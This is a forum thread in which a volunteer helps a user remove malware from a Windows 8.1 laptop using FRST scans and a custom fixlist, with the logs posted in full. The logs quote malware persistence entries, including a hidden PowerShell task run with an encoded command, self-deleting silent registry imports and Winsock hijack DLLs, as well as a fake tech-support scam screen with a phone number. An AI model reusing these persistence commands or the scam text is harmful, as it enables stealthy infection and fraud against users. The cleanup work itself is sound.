Solved Pretty sure our laptop has a virus/malware but don't know what to do - need step-by-step instruction

I only need the missing part of the Addition.txt log.
Part starting with:
==================== Shortcuts =============================

(The entries could be listed to be restored or removed.)
 
Thanks for letting me know that I didn't have to restart to redo... have posted all that was in the logs and was careful to ensure that nothing was missing. However, there was nothing more on the additional txt log as mentioned before. Doing my best to make sure that I follow your instructions :)
 
Download attached fixlist.txt file and save it to the Desktop.
NOTE. It's important that both files, FRST and fixlist.txt, are in the same location or the fix will not work.

NOTICE: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to your operating system.

Run FRST (FRST64) and press the Fix button just once and wait.
The tool will make a log on the Desktop (Fixlog.txt). Please post it to your reply.

When done, restart the computer in normal mode and see if you can operate it normally.
 

So before I start this next task, please answer the following questions in BOLD BLUE FONT as I do want to be very clear on what I'm doing:


1. Download attached fixlist.txt file and save it to the Desktop. (on the secondary computer that is working with the "clean USB" and then save it to the USB and then transfer the USB, saving both on the desktop of the affected laptop - as I don't have internet access in safe mode on the laptop - CORRECT?)
NOTE. It's important that both files, FRST and fixlist.txt are in the same location or the fix will not work.

NOTICE: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to your operating system

Run FRST(FRST64) and press the Fix button just once and wait. (this is done on the affected computer - CORRECT?)

The tool will make a log on the Desktop (Fixlog.txt). Please post it to your reply. (taking the USB from the affected laptop as I have for the Search and FRST text log - CORRECT?)

When done restart computer in normal mode and see if you can operate it normally (are you asking me to restart the affected laptop - CORRECT?)
 
Sorry, just being as clear as possible

Do it in the command prompt as in the very first instructions?
  • In the command window type e:\frst (for x64 bit version type e:\frst64) and press Enter
    Note:
    Replace letter e with the drive letter of your flash drive.
  • The tool will start to run.
So as follows:
E:\FRST64
The tool will run, then press FIX

(this is done on the affected computer - CORRECT?)
 
Okay done!! Here's the log

Fix result of Farbar Recovery Scan Tool (x64) Version:10-01-2015 01
Ran by owner (2016-01-10 20:36:06) Run:1
Running from E:\
Loaded Profiles: owner (Available Profiles: owner)
Boot Mode: Safe Mode (minimal)
==============================================

fixlist content:
*****************
Replace: C:\Windows\WinSxS\amd64_microsoft-windows-dns-client-minwin_31bf3856ad364e35_6.3.9600.17481_none_8646fe0af71f6b1d\dnsapi.dll C:\Windows\WinSxS\amd64_microsoft-windows-dns-client-minwin_31bf3856ad364e35_6.3.9600.17415_none_8696aea6f6e30ce2\dnsapi.dll
Replace: C:\Windows\WinSxS\amd64_microsoft-windows-dns-client-minwin_31bf3856ad364e35_6.3.9600.17481_none_8646fe0af71f6b1d\dnsapi.dll C:\Windows\System32\dnsapi.dll
Replace: C:\Windows\WinSxS\wow64_microsoft-windows-dns-client-minwin_31bf3856ad364e35_6.3.9600.17481_none_909ba85d2b802d18\dnsapi.dll C:\Windows\WinSxS\wow64_microsoft-windows-dns-client-minwin_31bf3856ad364e35_6.3.9600.17415_none_90eb58f92b43cedd\dnsapi.dll
Replace: C:\Windows\WinSxS\wow64_microsoft-windows-dns-client-minwin_31bf3856ad364e35_6.3.9600.17481_none_909ba85d2b802d18\dnsapi.dll C:\Windows\SysWOW64\dnsapi.dll
HKLM\...\Run: [Sound+] => "C:\Program Files\Sound+\Sound+.exe"
C:\Program Files\Sound+
HKLM-x32\...\Run: [LManager] => [X]
HKLM-x32\...\Run: [oasi_en_323010107] => [X]
HKU\S-1-5-21-3773202632-424774445-890114178-1001\...\Policies\system: [DisableTaskMgr] 1
AppInit_DLLs: C:\ProgramData\Medlight\Icenix.dll => No File
AppInit_DLLs-x32: C:\ProgramData\Medlight\Topstrong.dll => No File
GroupPolicy: Restriction - Chrome <======= ATTENTION
CHR HKLM\SOFTWARE\Policies\Google: Restriction <======= ATTENTION
Winsock: Catalog9 01 C:\WINDOWS\SysWOW64\Kefzha.dll [289144 2016-01-09] ()
Winsock: Catalog9 02 C:\WINDOWS\SysWOW64\Kefzha.dll [289144 2016-01-09] ()
Winsock: Catalog9 03 C:\WINDOWS\SysWOW64\Kefzha.dll [289144 2016-01-09] ()
Winsock: Catalog9 04 C:\WINDOWS\SysWOW64\Kefzha.dll [289144 2016-01-09] ()
Winsock: Catalog9 16 C:\WINDOWS\SysWOW64\Kefzha.dll [289144 2016-01-09] ()
Winsock: Catalog9-x64 01 C:\WINDOWS\system32\Kefzha64.dll [768376 2016-01-09] ()
Winsock: Catalog9-x64 02 C:\WINDOWS\system32\Kefzha64.dll [768376 2016-01-09] ()
Winsock: Catalog9-x64 03 C:\WINDOWS\system32\Kefzha64.dll [768376 2016-01-09] ()
Winsock: Catalog9-x64 04 C:\WINDOWS\system32\Kefzha64.dll [768376 2016-01-09] ()
Winsock: Catalog9-x64 16 C:\WINDOWS\system32\Kefzha64.dll [768376 2016-01-09] ()
SearchScopes: HKLM -> DefaultScope {87CE1942-94DA-4865-9277-D2ADDAA931E6} URL =
SearchScopes: HKU\S-1-5-21-3773202632-424774445-890114178-1001 -> DefaultScope {87CE1942-94DA-4865-9277-D2ADDAA931E6} URL =
S2 AmazingTab; C:\Program Files\amztab\amztab.exe [383488 2016-01-09] () [File not signed]
C:\Program Files\amztab
S2 Gejdiubx; "C:\Users\owner\AppData\Roaming\RujgAjueocf\Remdhuus.exe" -cms [X]
S3 EagleX64; \??\C:\WINDOWS\system32\drivers\EagleX64.sys [X]
S1 swsedrvr_vw_1_10_0_25; system32\drivers\swsedrvr_vw_1_10_0_25.sys [X]
2015-10-26 15:43 - 2015-10-26 15:43 - 0001167 _____ () C:\Users\owner\AppData\Roaming\trace_FilterInstaller.txt
2015-10-26 15:43 - 2015-10-26 15:43 - 0000000 _____ () C:\Users\owner\AppData\Roaming\trace_FilterInstaller.txt-CRT.txt
2015-04-21 19:15 - 2016-01-06 00:14 - 0000291 _____ () C:\Users\owner\AppData\Roaming\WB.CFG
2016-01-09 16:32 - 2016-01-09 16:32 - 0041472 _____ () C:\Users\owner\AppData\Local\Donelectronics.dat
2016-01-09 16:32 - 2016-01-09 16:32 - 0028160 _____ () C:\Users\owner\AppData\Local\Donelectronics.exe
2016-01-09 16:32 - 2016-01-09 16:32 - 0000187 _____ () C:\Users\owner\AppData\Local\Donelectronics.exe.config
2015-05-13 22:14 - 2015-05-13 22:14 - 0274045 _____ () C:\Users\owner\AppData\Local\dsi1.dat
2015-05-13 22:14 - 2015-05-13 22:14 - 0161916 _____ () C:\Users\owner\AppData\Local\dsi2.dat
2015-09-22 08:49 - 2015-09-22 08:49 - 0000000 _____ () C:\Users\owner\AppData\Local\{F9A1F101-40FE-48E1-BEBF-FD740E21840E}
2012-10-09 14:39 - 2012-10-09 14:39 - 0000000 ____H () C:\ProgramData\DP45977C.lfl
C:\Windows\Tasks\{0B7F0947-7E7A-0B05-7E11-797A790F110F}.job
C:\Windows\Tasks\{0D0F7F47-0B7A-097F-7E11-050A09041178}.job
C:\Users\owner\AppData\Local\Temp\2A80.tmp.exe
C:\Users\owner\AppData\Local\Temp\34EC.tmp.exe
C:\Users\owner\AppData\Local\Temp\3F71.tmp.exe
C:\Users\owner\AppData\Local\Temp\427B.tmp.exe
C:\Users\owner\AppData\Local\Temp\63FD.tmp.exe
C:\Users\owner\AppData\Local\Temp\6A02.tmp.exe
C:\Users\owner\AppData\Local\Temp\8076.tmp.exe
C:\Users\owner\AppData\Local\Temp\amisetup5102__15940.exe
C:\Users\owner\AppData\Local\Temp\amisetup9783__15940.exe
C:\Users\owner\AppData\Local\Temp\amzngtb.exe
C:\Users\owner\AppData\Local\Temp\avg6A34.exe
C:\Users\owner\AppData\Local\Temp\avgE955.exe
C:\Users\owner\AppData\Local\Temp\B213.tmp.exe
C:\Users\owner\AppData\Local\Temp\C512.tmp.exe
C:\Users\owner\AppData\Local\Temp\C546.tmp.exe
C:\Users\owner\AppData\Local\Temp\D8EB.tmp.exe
C:\Users\owner\AppData\Local\Temp\DA3.tmp.exe
C:\Users\owner\AppData\Local\Temp\DFF8.tmp.exe
C:\Users\owner\AppData\Local\Temp\EB6C.tmp.exe
C:\Users\owner\AppData\Local\Temp\FD40.tmp.exe
C:\Users\owner\AppData\Local\Temp\Flashbeat_Setup.exe
C:\Users\owner\AppData\Local\Temp\Looksafe_Setup.exe
C:\Users\owner\AppData\Local\Temp\nsz1850.exe
C:\Users\owner\AppData\Local\Temp\Opera_NI_stable.exe
C:\Users\owner\AppData\Local\Temp\setup_766.exe
C:\Users\owner\AppData\Local\Temp\SpOrder.dll
C:\Users\owner\AppData\Local\Temp\TranDex.exe
C:\Users\owner\AppData\Local\Temp\Uninstall.exe
C:\Users\owner\AppData\Local\Temp\UninstallModule.exe
C:\Users\owner\AppData\Local\Temp\Vivafind.exe
C:\Users\owner\AppData\Local\Temp\Voldom.exe
C:\Users\owner\AppData\Local\Temp\widgett.exe
Task: {08E144DB-88C1-4779-A060-554E4829D9D2} - System32\Tasks\GoogleUpdateTaskAdminTask-1-5-21-4287834998-254447837-4126873412-1010Main => C:\Users\owner\AppData\Local\Temp\is-FBE0G.tmp\ScreenCapture_Win8.exe [2016-01-09] (gltstech.net) <==== ATTENTION
C:\Users\owner\AppData\Local\Temp\is-FBE0G.tmp\ScreenCapture_Win8.exe
Task: {16528CA3-F849-4C28-B9DC-48BEBB959C9B} - \IBUpd -> No File <==== ATTENTION
Task: {23794007-224A-4E7F-9BBD-DF81D69DA5C6} - \Wse_taplika -> No File <==== ATTENTION
Task: {2973220D-0686-4846-8402-1B6902AB5EE0} - \One System Care Monitor -> No File <==== ATTENTION
Task: {2EE58792-0DF1-43F3-8876-01F8D027EEC0} - System32\Tasks\SwiftSearch Auto Updater 1.10.0.25 Pending Update => C:\Program Files (x86)\SwiftSearch_1.10.0.25\Update\SwiftSearchAutoUpdateClient.exe <==== ATTENTION
C:\Program Files (x86)\SwiftSearch_1.10.0.25
Task: {3AFE7DCE-A37F-406C-8FF9-4C2024106030} - System32\Tasks\SwiftSearch Auto Updater 1.10.0.25 Core => C:\Program Files (x86)\SwiftSearch_1.10.0.25\Update\SwiftSearchAutoUpdateClient.exe <==== ATTENTION
Task: {67153154-EDE8-41E9-947F-1251F35B6C8D} - System32\Tasks\{0D0F7F47-0B7A-097F-7E11-050A09041178} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand [Base64-encoded command omitted]
Task: {680E9242-EA06-4B9A-AD7F-3CB4585120DE} - System32\Tasks\psv_Temptough => /c regedit.exe /s "C:\ProgramData\Medlight\Physronwarm.reg" & del "C:\ProgramData\Medlight\Physronwarm.reg" & SCHTASKS /Delete /TN "psv_Temptough" /F <==== ATTENTION
C:\ProgramData\Medlight\Physronwarm.reg
Task: {92D813B2-AA5B-4A97-93B5-19CC0A69B867} - \One System Care Task -> No File <==== ATTENTION
Task: {9DDA3311-9424-4D32-902F-22A85EE0905D} - System32\Tasks\LSNHDG1 => C:\ProgramData\FlashBeat\FlashBeat.exe <==== ATTENTION
C:\ProgramData\Medlight
C:\ProgramData\FlashBeat
Task: {A56409DE-600B-4BC0-9A96-DF01E8D4AA28} - System32\Tasks\psv_Tripplezap => /c regedit.exe /s "C:\ProgramData\Medlight\Kay-Ity.reg" & del "C:\ProgramData\Medlight\Kay-Ity.reg" & SCHTASKS /Delete /TN "psv_Tripplezap" /F <==== ATTENTION
Task: {A6208F98-D826-4652-BF83-E7D44CA2A837} - \DNSARCHBOLD -> No File <==== ATTENTION
Task: {AF2DA830-E9A5-4C18-9C70-0913A510B21C} - \One System CarePeriod -> No File <==== ATTENTION
Task: {C0596212-D5EE-44AF-AAAB-07C61EDA0EC5} - \Taplika nise -> No File <==== ATTENTION
Task: {F975168C-909D-4C2D-8BC0-CFD9AC8553A4} - System32\Tasks\UXJOVQQVBISGUWLJ => C:\ProgramData\Service1291\Service1291.exe <==== ATTENTION
C:\ProgramData\Service1291
Task: C:\WINDOWS\Tasks\UXJOVQQVBISGUWLJ.job => C:\ProgramData\Service1291\Service1291.exe <==== ATTENTION
 
Last bit of the log and just to let you know that the original message is still there on the computer :( Seems like I'm in the same place - any further instructions to follow?

*****************

C:\Windows\WinSxS\amd64_microsoft-windows-dns-client-minwin_31bf3856ad364e35_6.3.9600.17415_none_8696aea6f6e30ce2\dnsapi.dll => moved successfully
Could not replace C:\Windows\WinSxS\amd64_microsoft-windows-dns-client-minwin_31bf3856ad364e35_6.3.9600.17415_none_8696aea6f6e30ce2\dnsapi.dll
C:\Windows\System32\dnsapi.dll => moved successfully
C:\Windows\WinSxS\amd64_microsoft-windows-dns-client-minwin_31bf3856ad364e35_6.3.9600.17481_none_8646fe0af71f6b1d\dnsapi.dll copied successfully to C:\Windows\System32\dnsapi.dll
C:\Windows\WinSxS\wow64_microsoft-windows-dns-client-minwin_31bf3856ad364e35_6.3.9600.17415_none_90eb58f92b43cedd\dnsapi.dll => moved successfully
Could not replace C:\Windows\WinSxS\wow64_microsoft-windows-dns-client-minwin_31bf3856ad364e35_6.3.9600.17415_none_90eb58f92b43cedd\dnsapi.dll
C:\Windows\SysWOW64\dnsapi.dll => moved successfully
C:\Windows\WinSxS\wow64_microsoft-windows-dns-client-minwin_31bf3856ad364e35_6.3.9600.17481_none_909ba85d2b802d18\dnsapi.dll copied successfully to C:\Windows\SysWOW64\dnsapi.dll
HKLM\Software\Microsoft\Windows\CurrentVersion\Run\\Sound+ => value removed successfully
C:\Program Files\Sound+ => moved successfully
HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\LManager => value removed successfully
HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\oasi_en_323010107 => value removed successfully
HKU\S-1-5-21-3773202632-424774445-890114178-1001\Software\Microsoft\Windows\CurrentVersion\Policies\system\\DisableTaskMgr => value removed successfully
"C:\ProgramData\Medlight\Icenix.dll" => Value data removed successfully.
"C:\ProgramData\Medlight\Topstrong.dll" => Value data removed successfully.
C:\WINDOWS\system32\GroupPolicy\Machine => moved successfully
C:\WINDOWS\system32\GroupPolicy\GPT.ini => moved successfully
C:\WINDOWS\SysWOW64\GroupPolicy\GPT.ini => moved successfully
"HKLM\SOFTWARE\Policies\Google" => key removed successfully
"HKLM\SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000001" => key removed successfully
"HKLM\SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000002" => key removed successfully
"HKLM\SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000003" => key removed successfully
"HKLM\SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000004" => key removed successfully
"HKLM\SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000016" => key removed successfully
"HKLM\SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries64\000000000001" => key removed successfully
"HKLM\SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries64\000000000002" => key removed successfully
"HKLM\SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries64\000000000003" => key removed successfully
"HKLM\SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries64\000000000004" => key removed successfully
"HKLM\SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries64\000000000016" => key removed successfully
HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => value restored successfully
HKU\S-1-5-21-3773202632-424774445-890114178-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => value removed successfully
AmazingTab => service removed successfully
C:\Program Files\amztab => moved successfully
Gejdiubx => service removed successfully
EagleX64 => service removed successfully
swsedrvr_vw_1_10_0_25 => service removed successfully
C:\Users\owner\AppData\Roaming\trace_FilterInstaller.txt => moved successfully
C:\Users\owner\AppData\Roaming\trace_FilterInstaller.txt-CRT.txt => moved successfully
C:\Users\owner\AppData\Roaming\WB.CFG => moved successfully
C:\Users\owner\AppData\Local\Donelectronics.dat => moved successfully
C:\Users\owner\AppData\Local\Donelectronics.exe => moved successfully
C:\Users\owner\AppData\Local\Donelectronics.exe.config => moved successfully
C:\Users\owner\AppData\Local\dsi1.dat => moved successfully
C:\Users\owner\AppData\Local\dsi2.dat => moved successfully
C:\Users\owner\AppData\Local\{F9A1F101-40FE-48E1-BEBF-FD740E21840E} => moved successfully
C:\ProgramData\DP45977C.lfl => moved successfully
C:\Windows\Tasks\{0B7F0947-7E7A-0B05-7E11-797A790F110F}.job => moved successfully
C:\Windows\Tasks\{0D0F7F47-0B7A-097F-7E11-050A09041178}.job => moved successfully
C:\Users\owner\AppData\Local\Temp\2A80.tmp.exe => moved successfully
C:\Users\owner\AppData\Local\Temp\34EC.tmp.exe => moved successfully
C:\Users\owner\AppData\Local\Temp\3F71.tmp.exe => moved successfully
C:\Users\owner\AppData\Local\Temp\427B.tmp.exe => moved successfully
C:\Users\owner\AppData\Local\Temp\63FD.tmp.exe => moved successfully
C:\Users\owner\AppData\Local\Temp\6A02.tmp.exe => moved successfully
C:\Users\owner\AppData\Local\Temp\8076.tmp.exe => moved successfully
C:\Users\owner\AppData\Local\Temp\amisetup5102__15940.exe => moved successfully
C:\Users\owner\AppData\Local\Temp\amisetup9783__15940.exe => moved successfully
C:\Users\owner\AppData\Local\Temp\amzngtb.exe => moved successfully
C:\Users\owner\AppData\Local\Temp\avg6A34.exe => moved successfully
C:\Users\owner\AppData\Local\Temp\avgE955.exe => moved successfully
C:\Users\owner\AppData\Local\Temp\B213.tmp.exe => moved successfully
C:\Users\owner\AppData\Local\Temp\C512.tmp.exe => moved successfully
C:\Users\owner\AppData\Local\Temp\C546.tmp.exe => moved successfully
C:\Users\owner\AppData\Local\Temp\D8EB.tmp.exe => moved successfully
C:\Users\owner\AppData\Local\Temp\DA3.tmp.exe => moved successfully
C:\Users\owner\AppData\Local\Temp\DFF8.tmp.exe => moved successfully
C:\Users\owner\AppData\Local\Temp\EB6C.tmp.exe => moved successfully
C:\Users\owner\AppData\Local\Temp\FD40.tmp.exe => moved successfully
C:\Users\owner\AppData\Local\Temp\Flashbeat_Setup.exe => moved successfully
C:\Users\owner\AppData\Local\Temp\Looksafe_Setup.exe => moved successfully
C:\Users\owner\AppData\Local\Temp\nsz1850.exe => moved successfully
C:\Users\owner\AppData\Local\Temp\Opera_NI_stable.exe => moved successfully
C:\Users\owner\AppData\Local\Temp\setup_766.exe => moved successfully
C:\Users\owner\AppData\Local\Temp\SpOrder.dll => moved successfully
C:\Users\owner\AppData\Local\Temp\TranDex.exe => moved successfully
C:\Users\owner\AppData\Local\Temp\Uninstall.exe => moved successfully
C:\Users\owner\AppData\Local\Temp\UninstallModule.exe => moved successfully
C:\Users\owner\AppData\Local\Temp\Vivafind.exe => moved successfully
C:\Users\owner\AppData\Local\Temp\Voldom.exe => moved successfully
C:\Users\owner\AppData\Local\Temp\widgett.exe => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Boot\{08E144DB-88C1-4779-A060-554E4829D9D2}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{08E144DB-88C1-4779-A060-554E4829D9D2}" => key removed successfully
C:\WINDOWS\System32\Tasks\GoogleUpdateTaskAdminTask-1-5-21-4287834998-254447837-4126873412-1010Main => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\GoogleUpdateTaskAdminTask-1-5-21-4287834998-254447837-4126873412-1010Main" => key removed successfully
C:\Users\owner\AppData\Local\Temp\is-FBE0G.tmp\ScreenCapture_Win8.exe => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{16528CA3-F849-4C28-B9DC-48BEBB959C9B}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{16528CA3-F849-4C28-B9DC-48BEBB959C9B}" => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\IBUpd => key not found.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{23794007-224A-4E7F-9BBD-DF81D69DA5C6}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{23794007-224A-4E7F-9BBD-DF81D69DA5C6}" => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Wse_taplika => key not found.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{2973220D-0686-4846-8402-1B6902AB5EE0}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{2973220D-0686-4846-8402-1B6902AB5EE0}" => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\One System Care Monitor => key not found.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{2EE58792-0DF1-43F3-8876-01F8D027EEC0}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{2EE58792-0DF1-43F3-8876-01F8D027EEC0}" => key removed successfully
C:\WINDOWS\System32\Tasks\SwiftSearch Auto Updater 1.10.0.25 Pending Update => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\SwiftSearch Auto Updater 1.10.0.25 Pending Update" => key removed successfully
"C:\Program Files (x86)\SwiftSearch_1.10.0.25" => not found.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{3AFE7DCE-A37F-406C-8FF9-4C2024106030}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{3AFE7DCE-A37F-406C-8FF9-4C2024106030}" => key removed successfully
C:\WINDOWS\System32\Tasks\SwiftSearch Auto Updater 1.10.0.25 Core => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\SwiftSearch Auto Updater 1.10.0.25 Core" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{67153154-EDE8-41E9-947F-1251F35B6C8D}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{67153154-EDE8-41E9-947F-1251F35B6C8D}" => key removed successfully
C:\WINDOWS\System32\Tasks\{0D0F7F47-0B7A-097F-7E11-050A09041178} => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{0D0F7F47-0B7A-097F-7E11-050A09041178}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{680E9242-EA06-4B9A-AD7F-3CB4585120DE}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{680E9242-EA06-4B9A-AD7F-3CB4585120DE}" => key removed successfully
C:\WINDOWS\System32\Tasks\psv_Temptough => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\psv_Temptough" => key removed successfully
"C:\ProgramData\Medlight\Physronwarm.reg" => not found.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{92D813B2-AA5B-4A97-93B5-19CC0A69B867}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{92D813B2-AA5B-4A97-93B5-19CC0A69B867}" => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\One System Care Task => key not found.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{9DDA3311-9424-4D32-902F-22A85EE0905D}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{9DDA3311-9424-4D32-902F-22A85EE0905D}" => key removed successfully
C:\WINDOWS\System32\Tasks\LSNHDG1 => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\LSNHDG1" => key removed successfully
"C:\ProgramData\Medlight" => not found.
"C:\ProgramData\FlashBeat" => not found.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{A56409DE-600B-4BC0-9A96-DF01E8D4AA28}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{A56409DE-600B-4BC0-9A96-DF01E8D4AA28}" => key removed successfully
C:\WINDOWS\System32\Tasks\psv_Tripplezap => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\psv_Tripplezap" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Boot\{A6208F98-D826-4652-BF83-E7D44CA2A837}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{A6208F98-D826-4652-BF83-E7D44CA2A837}" => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\DNSARCHBOLD => key not found.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{AF2DA830-E9A5-4C18-9C70-0913A510B21C}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{AF2DA830-E9A5-4C18-9C70-0913A510B21C}" => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\One System CarePeriod => key not found.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{C0596212-D5EE-44AF-AAAB-07C61EDA0EC5}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{C0596212-D5EE-44AF-AAAB-07C61EDA0EC5}" => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Taplika nise => key not found.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{F975168C-909D-4C2D-8BC0-CFD9AC8553A4}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{F975168C-909D-4C2D-8BC0-CFD9AC8553A4}" => key removed successfully
C:\WINDOWS\System32\Tasks\UXJOVQQVBISGUWLJ => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\UXJOVQQVBISGUWLJ" => key removed successfully
"C:\ProgramData\Service1291" => not found.
C:\WINDOWS\Tasks\UXJOVQQVBISGUWLJ.job => moved successfully


The system needed a reboot.

==== End of Fixlog 20:36:09 ====
 
Did you restart computer?
What does the message say?
Is it present in normal mode only?
Does safe mode WITH NETWORKING work?
 
So to answer:

Did you restart computer? Yes
What does the message say?

Original message with blue screen background:

Error................

The Problem seems to be caused by following files: kbdhid.sys
MANUALLY_INITIATED_CRASH

:( Restarting

(Caution triangle icon) Windows has detected usual activity and Security Breach on your Computer network and Infected Windows Files, Settings and Data.

Technical Information
Contact Windos Support Center for Further Assistance :-
Call Toll Free : 1-800-245-2579


Is it present in normal mode only? Yes
Does safe mode WITH NETWORKING work? Safe mode works when I can manage to get into it. Networking is available; however, I would need to set up a VPN. I've got wireless at home but for some reason my LAN doesn't work on my modem.

Hope that this info helps you....thanks for helping me ;)
 
Re-run Farbar Recovery Scan Tool (FRST/FRST64) you ran at the very beginning of this topic.

  • Double click to run it.
  • Make sure you checkmark Addition.txt box.
  • Press Scan button.
  • Scan will create two logs, FRST.txt and Addition.txt in the same directory the tool is run. Please copy and paste them to your reply.
 
Kbdhid.sys seems to be keyboard driver related.

The other message comes from an infection. Fake!
 
Now I can see more infection present in Task Scheduler so let's see if we can get rid of that as well.
 
Thanks for looking into this - I kinda knew that the error message was fake especially with the upside-down smiley faces and all of the pop-up ads. This may take some time as I've had a problem getting into safe mode.
 
So here's the first log txt and the additional txt log will follow:

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version:10-01-2015 01
Ran by owner (administrator) on ACER (10-01-2016 21:12:54)
Running from E:\
Loaded Profiles: owner (Available Profiles: owner)
Platform: Windows 8.1 (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser not detected!)
Boot Mode: Safe Mode (minimal)
Tutorial for Farbar Recovery Scan Tool:

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\cmd.exe


==================== Registry (Whitelisted) ===========================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [RtHDVCpl] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [12503184 2012-06-10] (Realtek Semiconductor)
